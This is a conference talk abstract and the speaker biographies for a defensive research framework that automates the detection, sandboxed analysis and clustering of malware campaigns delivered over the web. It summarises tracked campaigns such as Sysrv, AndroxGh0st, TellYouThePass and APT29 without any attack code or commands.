Unmasking APT Malware Activity: Real-World Malware Campaign Tracking Using Big Data Analytics and Machine Learning Clustering
2024-12-14 , Track 2

Our talk introduces an innovative framework for automating the identification and handling of malware samples targeting web servers, leveraging big data analytics and machine learning to cluster and track active malware campaigns. We will demonstrate an innovative and unique framework that employs heuristic analysis to autonomously identify and process web-delivered malware samples. This framework enhances the efficiency and accuracy of malware detection in large data sets, reducing the reliance on manual intervention, and enabling near real-time threat hunting, and campaign tracking.

Building upon the collected malware data, we utilize big data analytics techniques to track and monitor malwares, cluster similar malware samples and associated network activity, to unveil patterns and connections between various campaigns. This clustering approach provides deeper insights into the tactics, techniques, and procedures (TTPs) employed by threat actors, facilitating the identification of overarching strategies and objectives.

We will conclude with a detailed analysis of notable real-world malware campaigns identified through this system. Attendees will gain insights into the operational methodologies of these campaigns, their impact and the defensive measures that can be employed. Case studies will highlight real-world applications and the effectiveness of our automated approach in enhancing cybersecurity posture.


In this talk we will conduct a deep dive into the framework we developed for automating the identification and handling of malware samples targeting web servers, it will consist of four parts:

Part 1: Introduction

  • Provide a baseline understanding of how threat actors can leverage web vulnerabilities to deploy malware.
  • Introduce the challenge of identifying, clustering and tracking malware data in the real world.
  • Introduction to the data we collect, with a focus on the real-world malware data we track.
  • Discuss what can be gained by effectively identifying and tracking malware campaigns in real world scenarios.

Part 2: Automated Malware Handling

  • Explain and demonstrate the framework we developed to automate the handling of web-delivered malware samples, including:
    1. Identification of malware delivery using RCE attacks against web applications.
    2. Safe downloading, storing and analysis of identified samples using a sandboxed environment.
    3. Importing sample information to enrich existing data.

Part 3: Clustering of Malware data and Anomaly Detection

  • Using big data analytics to aggregate data from multiple cloud regions, and calculate distances for clustering
  • Demonstrate a novel open source tool we developed, for counters collection, aggregation and anomaly detection powered by an SQL engine and cloud functions
  • Explain how the tool utilizes advanced detection methods for trends and patterns in the malware data

Part 4: Identified Campaigns

Review several campaigns detected by the framework, including:
- Sysrv Botnet: How we identified and correlated events related to activity of the Sysrv botnet, uncovering new attack vectors and TTPs. (https://tinyurl.com/sysrvb)
- AndroxGhost: How we identified AndroxGh0st malware activity, and were able to provide previously undocumented TTPs and attack vectors augmenting a previously published report by CISA. (https://tinyurl.com/axghost)
- TellYouThePass: How we quickly uncovered a malicious campaign to deliver TellYouThePass ransomware leveraging the new PHP vulnerability CVE-2024-4577. (https://tinyurl.com/tytpr)
- 8220 Gang: How we exposed new tactics and vectors utilized by the well-known threat actors 8220 Gang. (https://tinyurl.com/8220gang)
- APT29: How we were able to identify and track activity from the Russian APT specifically targeting Polish Government domains to drop RAT Malware (unpublished)

Atendees can expect the following takeaways:

  1. Utilizing a combination of automation, big data analytics, and anomaly detection allows you to effectively identify and track cyber attacks. Usage of common tools like cloud data lakes and managed query engines can make such tasks quick and efficient.

  2. Many threat actors, including APT groups, commonly use web vulnerabilities to target nation states and propagate dangerous malware. This activity can be consistently detected using the demonstrated framework.

  3. Identification, correlation and tracking of malware campaign activity is of interest to a wide demographic within the security community, we aim to provide a useful set of ideas and tools to assist with this difficult problem.

Daniel Johnston is a security researcher in the Imperva Threat Research group. Daniel holds a MSc in Cyber Security from Queen's University Belfast, and has over 7 years of experience in network and web application security. At Imperva Daniel specializes in web application security, bot detection, malware and threat intelligence research.

Security Researcher, Data Engineer, and Data Scientist at Imperva Threat Research Group. I specialize in application and database security, leveraging expertise in data analytics, data science, and automation to drive innovative security solutions.